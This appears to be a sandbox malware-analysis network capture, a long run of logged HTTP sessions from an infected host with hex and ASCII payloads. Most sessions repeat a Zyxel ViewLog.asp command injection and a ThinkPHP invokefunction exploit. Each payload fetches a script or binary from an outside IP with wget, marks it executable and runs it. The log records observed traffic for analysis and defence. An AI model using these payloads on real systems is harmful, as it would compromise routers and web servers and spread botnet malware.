                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        819192.168.2.143901494.121.78.2428080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:50.704015017 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        820192.168.2.143363495.85.13.9380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:50.864850998 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:51.061309099 CET404INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:50 GMT
                                                        Server: Apache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        821192.168.2.144416031.136.63.288080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:50.888293982 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:51.524665117 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:52.772629976 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:55.332645893 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:00.452334881 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:10.436012983 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:30.403069019 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:11.361596107 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        822192.168.2.144342431.136.16.468080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:50.898763895 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:51.588706017 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:52.932630062 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:55.844691038 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:01.220312119 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:11.971971989 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:34.498897076 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        823192.168.2.143299031.136.246.38080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:50.899286032 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:51.588694096 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:52.932636976 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:55.844666958 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:01.220330954 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:11.971956015 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:34.498910904 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        824192.168.2.144061895.86.118.2168080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:50.957164049 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        825192.168.2.144052295.101.165.2580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:51.034372091 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:51.400233030 CET478INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 256
                                                        Expires: Wed, 14 Feb 2024 08:34:51 GMT
                                                        Date: Wed, 14 Feb 2024 08:34:51 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 63 30 39 30 65 63 34 26 23 34 36 3b 31 37 30 37 38 39 39 36 39 31 26 23 34 36 3b 62 63 35 36 31 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;2c090ec4&#46;1707899691&#46;bc561e</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        826192.168.2.143659631.136.215.2238080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:51.309930086 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:51.940670013 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:53.188834906 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:55.844666958 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
